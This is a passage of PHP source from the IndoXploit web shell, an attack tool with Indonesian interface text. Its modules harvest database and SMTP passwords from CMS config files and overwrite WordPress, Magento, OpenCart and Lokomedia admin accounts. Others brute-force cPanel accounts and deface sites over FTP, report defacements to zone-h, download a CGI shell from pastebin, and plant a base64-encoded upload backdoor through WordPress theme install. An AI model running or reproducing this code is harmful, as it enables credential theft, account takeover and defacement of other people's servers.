852. } else {
853. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
854. }
855. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
856. echo "Config => ".$file_conf."<br>";
857. echo "CMS => Wordpress<br>";
858. echo $url_target;
859. if(!$update OR !$conn OR !$db) {
860. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
861. } else {
862. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
863. }
864. mysql_close($conn);
865. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
866. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
867. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
868. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
869. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
870. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
871. $prefix = $dbprefix."admin_user";
872. $option = $dbprefix."core_config_data";
873. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
874. $db = mysql_select_db($dbname);
875. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
876. $result = mysql_fetch_array($q);
877. $id = $result[user_id];
878. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
879. $result2 = mysql_fetch_array($q2);
880. $target = $result2[value];
881. if($target == '') {
882. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
883. } else {
884. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
885. }
886. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
887. echo "Config => ".$file_conf."<br>";
888. echo "CMS => Magento<br>";
889. echo $url_target;
890. if(!$update OR !$conn OR !$db) {
891. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
892. } else {
893. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
894. }
895. mysql_close($conn);
896. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
897. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
898. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
899. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
900. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
901. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
902. $prefix = $dbprefix."user";
903. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
904. $db = mysql_select_db($dbname);
905. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
906. $result = mysql_fetch_array($q);
907. $id = $result[user_id];
908. $target = ambilkata($config,"HTTP_SERVER', '","'");
909. if($target == '') {
910. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
911. } else {
912. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
913. }
914. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
915. echo "Config => ".$file_conf."<br>";
916. echo "CMS => OpenCart<br>";
917. echo $url_target;
918. if(!$update OR !$conn OR !$db) {
919. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
920. } else {
921. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
922. }
923. mysql_close($conn);
924. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
925. $dbhost = ambilkata($config,'server = "','"');
926. $dbuser = ambilkata($config,'username = "','"');
927. $dbpass = ambilkata($config,'password = "','"');
928. $dbname = ambilkata($config,'database = "','"');
929. $prefix = "users";
930. $option = "identitas";
931. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
932. $db = mysql_select_db($dbname);
933. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
934. $result = mysql_fetch_array($q);
935. $target = $result[alamat_website];
936. if($target == '') {
937. $target2 = $result[url];
938. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
939. if($target2 == '') {
940. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
941. } else {
942. $cek_login3 = file_get_contents("$target2/adminweb/");
943. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
944. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
945. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
946. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
947. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
948. } else {
949. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
950. }
951. }
952. } else {
953. $cek_login = file_get_contents("$target/adminweb/");
954. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
955. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
956. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
957. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
958. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
959. } else {
960. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
961. }
962. }
963. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
964. echo "Config => ".$file_conf."<br>";
965. echo "CMS => Lokomedia<br>";
966. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
967. echo $url_target2;
968. } else {
969. echo $url_target;
970. }
971. if(!$update OR !$conn OR !$db) {
972. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
973. } else {
974. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
975. }
976. mysql_close($conn);
977. }
978. }
979. }
980. } else {
981. echo "<center>
982. <h1>Auto Edit User Config</h1>
983. <form method='post'>
984. DIR Config: <br>
985. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
986. Set User & Pass: <br>
987. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
988. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
989. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
990. </form>
991. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
992. ";
993. }
994. } elseif($_GET['do'] == 'cpanel') {
995. if($_POST['crack']) {
996. $usercp = explode("\r\n", $_POST['user_cp']);
997. $passcp = explode("\r\n", $_POST['pass_cp']);
998. $i = 0;
999. foreach($usercp as $ucp) {
1000. foreach($passcp as $pcp) {
1001. if(@mysql_connect('localhost', $ucp, $pcp)) {
1002. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1003. } else {
1004. $_SESSION[$ucp] = "1";
1005. $_SESSION[$pcp] = "1";
1006. if($ucp == '' || $pcp == '') {
1007.  
1008. } else {
1009. $i++;
1010. if(function_exists('posix_getpwuid')) {
1011. $domain_cp = file_get_contents("/etc/named.conf");
1012. if($domain_cp == '') {
1013. $dom = "<font color=red>ERROR!</font>";
1014. } else {
1015. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1016. foreach($domains_cp[1] as $dj) {
1017. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1018. $user_cp_url = $user_cp_url['name'];
1019. if($user_cp_url == $ucp) {
1020. $dom = "<a href='http://$dj/' target='_blank'><font color=red>$dj</font></a>";
1021. break;
1022. }
1023. }
1024. }
1025. } else {
1026. $dom = "<font color=red>function is Disable by system</font>";
1027. }
1028. echo "username (<font color=red>$ucp</font>) password (<font color=red>$pcp</font>) domain ($dom)<br>";
1029. }
1030. }
1031. }
1032. }
1033. }
1034. if($i == 0) {
1035. } else {
1036. echo "<br>sukses nyolong ".$i." Cpanel by <font color=red>IndoXploit.</font>";
1037. }
1038. } else {
1039. echo "<center>
1040. <form method='post'>
1041. USER: <br>
1042. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1043. $_usercp = fopen("/etc/passwd","r");
1044. while($getu = fgets($_usercp)) {
1045. if($getu == '' || !$_usercp) {
1046. echo "<font color=red>Can't read /etc/passwd</font>";
1047. } else {
1048. preg_match_all("/(.*?):x:/", $getu, $u);
1049. foreach($u[1] as $user_cp) {
1050. if(is_dir("/home/$user_cp/public_html")) {
1051. echo "$user_cp\n";
1052. }
1053. }
1054. }
1055. }
1056. echo "</textarea><br>
1057. PASS: <br>
1058. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1059. function cp_pass($dir) {
1060. $pass = "";
1061. $dira = scandir($dir);
1062. foreach($dira as $dirb) {
1063. if(!is_file("$dir/$dirb")) continue;
1064. $ambil = file_get_contents("$dir/$dirb");
1065. if(preg_match("/WordPress/", $ambil)) {
1066. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1067. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1068. $pass .= ambilkata($ambil,"password = '","'")."\n";
1069. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1070. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1071. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1072. $pass .= ambilkata($ambil,'password = "','"')."\n";
1073. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1074. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1075. } elseif(preg_match("/^[client]$/", $ambil)) {
1076. preg_match("/password=(.*?)/", $ambil, $pass1);
1077. if(preg_match('/"/', $pass1[1])) {
1078. $pass1[1] = str_replace('"', "", $pass1[1]);
1079. $pass .= $pass1[1]."\n";
1080. } else {
1081. $pass .= $pass1[1]."\n";
1082. }
1083. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1084. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1085. }
1086. }
1087. echo $pass;
1088. }
1089. $cp_pass = cp_pass($dir);
1090. echo $cp_pass;
1091. echo "</textarea><br>
1092. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1093. </form>
1094. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1095. }
1096. } elseif($_GET['do'] == 'cpftp_auto') {
1097. if($_POST['crack']) {
1098. $usercp = explode("\r\n", $_POST['user_cp']);
1099. $passcp = explode("\r\n", $_POST['pass_cp']);
1100. $i = 0;
1101. foreach($usercp as $ucp) {
1102. foreach($passcp as $pcp) {
1103. if(@mysql_connect('localhost', $ucp, $pcp)) {
1104. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1105. } else {
1106. $_SESSION[$ucp] = "1";
1107. $_SESSION[$pcp] = "1";
1108. if($ucp == '' || $pcp == '') {
1109. //
1110. } else {
1111. echo "[+] username (<font color=red>$ucp</font>) password (<font color=red>$pcp</font>)<br>";
1112. $ftp_conn = ftp_connect($ip);
1113. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1114. if((!$ftp_login) || (!$ftp_conn)) {
1115. echo "[+] <font color=red>Login Gagal</font><br><br>";
1116. } else {
1117. echo "[+] <font color=red>Login Sukses</font><br>";
1118. $fi = htmlspecialchars($_POST['file_deface']);
1119. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1120. if($deface) {
1121. $i++;
1122. echo "[+] <font color=red>Deface Sukses</font><br>";
1123. if(function_exists('posix_getpwuid')) {
1124. $domain_cp = file_get_contents("/etc/named.conf");
1125. if($domain_cp == '') {
1126. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1127. } else {
1128. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1129. foreach($domains_cp[1] as $dj) {
1130. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1131. $user_cp_url = $user_cp_url['name'];
1132. if($user_cp_url == $ucp) {
1133. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1134. break;
1135. }
1136. }
1137. }
1138. } else {
1139. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1140. }
1141. } else {
1142. echo "[-] <font color=red>Deface Gagal</font><br><br>";
1143. }
1144. }
1145. //echo "username (<font color=red>$ucp</font>) password (<font color=red>$pcp</font>)<br>";
1146. }
1147. }
1148. }
1149. }
1150. }
1151. if($i == 0) {
1152. } else {
1153. echo "<br>sukses deface ".$i." Cpanel by <font color=red>IndoXploit.</font>";
1154. }
1155. } else {
1156. echo "<center>
1157. <form method='post'>
1158. Filename: <br>
1159. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1160. Deface Page: <br>
1161. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1162. USER: <br>
1163. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1164. $_usercp = fopen("/etc/passwd","r");
1165. while($getu = fgets($_usercp)) {
1166. if($getu == '' || !$_usercp) {
1167. echo "<font color=red>Can't read /etc/passwd</font>";
1168. } else {
1169. preg_match_all("/(.*?):x:/", $getu, $u);
1170. foreach($u[1] as $user_cp) {
1171. if(is_dir("/home/$user_cp/public_html")) {
1172. echo "$user_cp\n";
1173. }
1174. }
1175. }
1176. }
1177. echo "</textarea><br>
1178. PASS: <br>
1179. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1180. function cp_pass($dir) {
1181. $pass = "";
1182. $dira = scandir($dir);
1183. foreach($dira as $dirb) {
1184. if(!is_file("$dir/$dirb")) continue;
1185. $ambil = file_get_contents("$dir/$dirb");
1186. if(preg_match("/WordPress/", $ambil)) {
1187. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1188. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1189. $pass .= ambilkata($ambil,"password = '","'")."\n";
1190. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1191. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1192. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1193. $pass .= ambilkata($ambil,'password = "','"')."\n";
1194. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1195. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1196. } elseif(preg_match("/client/", $ambil)) {
1197. preg_match("/password=(.*)/", $ambil, $pass1);
1198. if(preg_match('/"/', $pass1[1])) {
1199. $pass1[1] = str_replace('"', "", $pass1[1]);
1200. $pass .= $pass1[1]."\n";
1201. }
1202. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1203. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1204. }
1205. }
1206. echo $pass;
1207. }
1208. $cp_pass = cp_pass($dir);
1209. echo $cp_pass;
1210. echo "</textarea><br>
1211. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1212. </form>
1213. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1214. }
1215. } elseif($_GET['do'] == 'smtp') {
1216. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1217. function scj($dir) {
1218. $dira = scandir($dir);
1219. foreach($dira as $dirb) {
1220. if(!is_file("$dir/$dirb")) continue;
1221. $ambil = file_get_contents("$dir/$dirb");
1222. $ambil = str_replace("$", "", $ambil);
1223. if(preg_match("/JConfig|joomla/", $ambil)) {
1224. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1225. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1226. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1227. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1228. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1229. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1230. echo "SMTP Host: <font color=red>$smtp_host</font><br>";
1231. echo "SMTP port: <font color=red>$smtp_port</font><br>";
1232. echo "SMTP user: <font color=red>$smtp_user</font><br>";
1233. echo "SMTP pass: <font color=red>$smtp_pass</font><br>";
1234. echo "SMTP auth: <font color=red>$smtp_auth</font><br>";
1235. echo "SMTP secure: <font color=red>$smtp_secure</font><br><br>";
1236. }
1237. }
1238. }
1239. $smpt_hunter = scj($dir);
1240. echo $smpt_hunter;
1241. } elseif($_GET['do'] == 'auto_wp') {
1242. if($_POST['hajar']) {
1243. $title = htmlspecialchars($_POST['new_title']);
1244. $pn_title = str_replace(" ", "-", $title);
1245. if($_POST['cek_edit'] == "Y") {
1246. $script = $_POST['edit_content'];
1247. } else {
1248. $script = $title;
1249. }
1250. $conf = $_POST['config_dir'];
1251. $scan_conf = scandir($conf);
1252. foreach($scan_conf as $file_conf) {
1253. if(!is_file("$conf/$file_conf")) continue;
1254. $config = file_get_contents("$conf/$file_conf");
1255. if(preg_match("/WordPress/", $config)) {
1256. $dbhost = ambilkata($config,"DB_HOST', '","'");
1257. $dbuser = ambilkata($config,"DB_USER', '","'");
1258. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1259. $dbname = ambilkata($config,"DB_NAME', '","'");
1260. $dbprefix = ambilkata($config,"table_prefix = '","'");
1261. $prefix = $dbprefix."posts";
1262. $option = $dbprefix."options";
1263. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1264. $db = mysql_select_db($dbname);
1265. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1266. $result = mysql_fetch_array($q);
1267. $id = $result[ID];
1268. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1269. $result2 = mysql_fetch_array($q2);
1270. $target = $result2[option_value];
1271. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1272. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1273. echo "<div style='margin: 5px auto;'>";
1274. if($target == '') {
1275. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1276. } else {
1277. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1278. }
1279. if(!$update OR !$conn OR !$db) {
1280. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1281. } else {
1282. echo "<font color=red>sukses di ganti.</font><br>";
1283. }
1284. echo "</div>";
1285. mysql_close($conn);
1286. }
1287. }
1288. } else {
1289. echo "<center>
1290. <h1>Auto Edit Title+Content WordPress</h1>
1291. <form method='post'>
1292. DIR Config: <br>
1293. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1294. Set Title: <br>
1295. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
1296. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1297. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1298. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1299. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1300. </form>
1301. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1302. ";
1303. }
1304. } elseif($_GET['do'] == 'zoneh') {
1305. if($_POST['submit']) {
1306. $domain = explode("\r\n", $_POST['url']);
1307. $nick = $_POST['nick'];
1308. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1309. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1310. function zoneh($url,$nick) {
1311. $ch = curl_init("http://www.zone-h.com/notify/single");
1312. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1313. curl_setopt($ch, CURLOPT_POST, true);
1314. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1315. return curl_exec($ch);
1316. curl_close($ch);
1317. }
1318. foreach($domain as $url) {
1319. $zoneh = zoneh($url,$nick);
1320. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1321. echo "$url -> <font color=red>OK</font><br>";
1322. } else {
1323. echo "$url -> <font color=red>ERROR</font><br>";
1324. }
1325. }
1326. } else {
1327. echo "<center><form method='post'>
1328. <u>Defacer</u>: <br>
1329. <input type='text' name='nick' size='50' value='IndoXploit'><br>
1330. <u>Domains</u>: <br>
1331. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1332. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1333. </form>";
1334. }
1335. echo "</center>";
1336. } elseif($_GET['do'] == 'cgi') {
1337. $cgi_dir = mkdir('idx_cgi', 0755);
1338. $file_cgi = "idx_cgi/cgi.izo";
1339. $isi_htcgi = "AddHandler cgi-script .izo";
1340. $htcgi = fopen(".htaccess", "w");
1341. fwrite($htcgi, $isi_htcgi);
1342. fclose($htcgi);
1343. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1344. $cgi = fopen($file_cgi, "w");
1345. fwrite($cgi, $cgi_script);
1346. fclose($cgi);
1347. chmod($file_cgi, 0755);
1348. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1349. } elseif($_GET['do'] == 'fake_root') {
1350. ob_start();
1351. $cwd = getcwd();
1352. $ambil_user = explode("/", $cwd);
1353. $user = $ambil_user[2];
1354. if($_POST['reverse']) {
1355. $site = explode("\r\n", $_POST['url']);
1356. $file = $_POST['file'];
1357. foreach($site as $url) {
1358. $cek = getsource("$url/~$user/$file");
1359. if(preg_match("/hacked/i", $cek)) {
1360. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=red>Fake Root!</font><br>";
1361. }
1362. }
1363. } else {
1364. echo "<center><form method='post'>
1365. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1366. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1367. Domain: <br>
1368. <textarea style='width: 450px; height: 250px;' name='url'>";
1369. reverse($_SERVER['HTTP_HOST']);
1370. echo "</textarea><br>
1371. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1372. </form><br>
1373. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1374. }
1375. } elseif($_GET['do'] == 'adminer') {
1376. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1377. function adminer($url, $isi) {
1378. $fp = fopen($isi, "w");
1379. $ch = curl_init();
1380. curl_setopt($ch, CURLOPT_URL, $url);
1381. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1382. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1383. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1384. curl_setopt($ch, CURLOPT_FILE, $fp);
1385. return curl_exec($ch);
1386. curl_close($ch);
1387. fclose($fp);
1388. ob_flush();
1389. flush();
1390. }
1391. if(file_exists('adminer.php')) {
1392. echo "<center><font color=red><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1393. } else {
1394. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1395. echo "<center><font color=red><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1396. } else {
1397. echo "<center><font color=red>gagal buat file adminer</font></center>";
1398. }
1399. }
1400. } elseif($_GET['do'] == 'auto_dwp') {
1401. if($_POST['auto_deface_wp']) {
1402. function anucurl($sites) {
1403. $ch = curl_init($sites);
1404. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1405. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1406. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1407. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1408. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1409. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1410. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1411. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1412. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1413. $data = curl_exec($ch);
1414. curl_close($ch);
1415. return $data;
1416. }
1417. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1418. $post = array(
1419. "log" => "$userr",
1420. "pwd" => "$pass",
1421. "rememberme" => "forever",
1422. "wp-submit" => "$wp_submit",
1423. "redirect_to" => "$web",
1424. "testcookie" => "1",
1425. );
1426. $ch = curl_init($cek);
1427. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1428. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1429. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1430. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1431. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1432. curl_setopt($ch, CURLOPT_POST, 1);
1433. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1434. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1435. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1436. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1437. $data = curl_exec($ch);
1438. curl_close($ch);
1439. return $data;
1440. }
1441. $scan = $_POST['link_config'];
1442. $link_config = scandir($scan);
1443. $script = htmlspecialchars($_POST['script']);
1444. $user = "indoxploit";
1445. $pass = "indoxploit";
1446. $passx = md5($pass);
1447. foreach($link_config as $dir_config) {
1448. if(!is_file("$scan/$dir_config")) continue;
1449. $config = file_get_contents("$scan/$dir_config");
1450. if(preg_match("/WordPress/", $config)) {
1451. $dbhost = ambilkata($config,"DB_HOST', '","'");
1452. $dbuser = ambilkata($config,"DB_USER', '","'");
1453. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1454. $dbname = ambilkata($config,"DB_NAME', '","'");
1455. $dbprefix = ambilkata($config,"table_prefix = '","'");
1456. $prefix = $dbprefix."users";
1457. $option = $dbprefix."options";
1458. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1459. $db = mysql_select_db($dbname);
1460. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1461. $result = mysql_fetch_array($q);
1462. $id = $result[ID];
1463. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1464. $result2 = mysql_fetch_array($q2);
1465. $target = $result2[option_value];
1466. if($target == '') {
1467. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1468. } else {
1469. echo "[+] $target <br>";
1470. }
1471. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1472. if(!$conn OR !$db OR !$update) {
1473. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1474. mysql_close($conn);
1475. } else {
1476. $site = "$target/wp-login.php";
1477. $site2 = "$target/wp-admin/theme-install.php?upload";
1478. $b1 = anucurl($site2);
1479. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1480. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1481. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1482. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1483. $www = "m.php";
1484. $fp5 = fopen($www,"w");
1485. fputs($fp5,$upload3);
1486. $post2 = array(
1487. "_wpnonce" => "$anu2",
1488. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1489. "themezip" => "@$www",
1490. "install-theme-submit" => "Install Now",
1491. );
1492. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1493. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1494. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1495. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
